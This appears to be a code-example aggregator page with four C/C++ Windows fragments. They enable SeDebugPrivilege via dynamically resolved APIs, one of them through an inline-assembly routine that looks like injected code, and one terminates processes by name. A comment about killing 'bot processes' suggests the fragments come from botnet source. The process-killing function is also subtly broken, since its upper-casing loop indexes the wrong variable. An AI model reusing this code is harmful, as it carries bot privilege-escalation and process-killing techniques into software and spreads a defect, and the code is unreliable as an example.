예제 #1
0
BOOL AdjustPrivileges(char *pPriv, BOOL add)
{
	BOOL bRet = FALSE;
	TOKEN_PRIVILEGES tkp;
 	HANDLE hToken;

	if (!fOpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
		return bRet;

	if (!fLookupPrivilegeValue(NULL, pPriv, &tkp.Privileges[0].Luid)) {
		CloseHandle(hToken);
		return bRet;
	}

	tkp.PrivilegeCount = 1;
	if (add)
		tkp.Privileges[0].Attributes |= SE_PRIVILEGE_ENABLED;
	else
		tkp.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &
			tkp.Privileges[0].Attributes);

	bRet=fAdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES) NULL, 0);

	CloseHandle(hToken);

	return bRet;
}
예제 #2
0
BOOL GetDebugPrivs(HANDLE &hToken,TOKEN_PRIVILEGES &tPrivOld)
{
	TOKEN_PRIVILEGES tPriv;
	DWORD cbPriv=sizeof(tPrivOld);
	BOOL bRet=FALSE;
	if(!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
		if(!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, &hToken))
			hToken=NULL;

	if(hToken)
	{
		tPriv.PrivilegeCount=1;
		tPriv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
		fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);
		if(fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv))
		{
			if(GetLastError()==ERROR_NOT_ALL_ASSIGNED)
			{
				CloseHandle(hToken);
				hToken=NULL;
			}
			else
				bRet=TRUE;
		}
		else
		{
			CloseHandle(hToken);
			hToken=NULL;
		}
	}
	return bRet;
}
예제 #3
0
// OpenProcessToken
// GetCurrentProcess
// LookupPrivilegeValue
// AdjustTokenPrivileges
// SE_DEBUG_NAME "SeDebugPrivilege"
BOOL WINAPI IC_SetDebugPrivilege(HANDLE *phProcessToken, TOKEN_PRIVILEGES *pOldToken, DWORD *pdwOldCount)
{
	TOKEN_PRIVILEGES stNewToken;

	char *pSeDebugPrivilege = NULL;
	t_fAdjustTokenPrivilegeS fAdjustTokenPrivileges = NULL;
	t_fLookUpPrivilegeValue fLookupPrivilegeValue = NULL;
	t_fGetCurrentProcess fGetCurrentProcess = NULL;
	t_fOpenProcessToken fOpenProcessToken = NULL;

	DWORD *pFuncPtr = NULL;

	_asm	MOV	pFuncPtr, EAX
	
	pFuncPtr -= 2;
	pSeDebugPrivilege = (char*)*pFuncPtr;

	pFuncPtr--;
	fAdjustTokenPrivileges = (t_fAdjustTokenPrivilegeS)*pFuncPtr;

	pFuncPtr--;
	fLookupPrivilegeValue = (t_fLookUpPrivilegeValue)*pFuncPtr;

	pFuncPtr--;
	fGetCurrentProcess = (t_fGetCurrentProcess)*pFuncPtr;

	pFuncPtr--;
	fOpenProcessToken = (t_fOpenProcessToken)*pFuncPtr;

	if ( !fOpenProcessToken(fGetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, phProcessToken) )
	{
		return FALSE;
	}

	if ( !fLookupPrivilegeValue(NULL, pSeDebugPrivilege, &(stNewToken.Privileges[0].Luid)) )
	{
		return FALSE;
	}

	stNewToken.PrivilegeCount = 1;
	stNewToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	if ( !fAdjustTokenPrivileges(*phProcessToken, FALSE, &stNewToken, sizeof(TOKEN_PRIVILEGES), pOldToken, pdwOldCount) )
	{
		return FALSE;
	}

	return TRUE;
}
예제 #4
0
bool KillProcess(const char *szProcName, char *procKilled) {
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	bool bRetVal=false;
	unsigned int i;
	HMODULE hMod;

	// Get SeDebugPrivileges
	TOKEN_PRIVILEGES tPriv, tPrivOld;
	DWORD cbPriv=sizeof(tPrivOld);
	HANDLE hToken;
	
	if(!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
		if(!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, &hToken))
			hToken=NULL;

	if(hToken) {
		tPriv.PrivilegeCount=1; tPriv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
		fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);
		if(fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv)) {
			if(GetLastError()==ERROR_NOT_ALL_ASSIGNED) {
				CloseHandle(hToken); hToken=NULL;
			}
		} else {
			CloseHandle(hToken);
			hToken=NULL;
		}
	}

	// Enumerate processes
	if(!fEnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
		return false;
	cProcesses=cbNeeded/sizeof(DWORD);

	unsigned int killed=0;
	for(i=0; i<cProcesses; i++) {
		char szProcessName[MAX_PATH];
		strcpy(szProcessName, "unknown");
		HANDLE hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ|PROCESS_TERMINATE,FALSE,aProcesses[i]);
		if(hProcess) {
			if(fEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
				fGetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
				for(int ipn=0;ipn<strlen(szProcessName);ipn++)
					*(szProcessName+i)=toupper(*(szProcessName+i));
				
				if(!szProcName) {
					bRetVal=false; // FIX ME: Could Kill all bot processes here
				}
				else { // Kill the named process
					if(!strcmp(szProcessName, szProcName)) {
						killed++;
						TerminateProcess(hProcess, 0);
						bRetVal=true;
					}
				}
			}
			CloseHandle(hProcess);
		}
	}

	if (procKilled)
		sprintf(procKilled,"%i",killed);
	
	// Drop SeDebugPrivileges
	if(hToken) {
		fAdjustTokenPrivileges(hToken, FALSE, &tPrivOld, sizeof(tPrivOld), NULL, NULL);
		CloseHandle(hToken);
	}

	return bRetVal;
}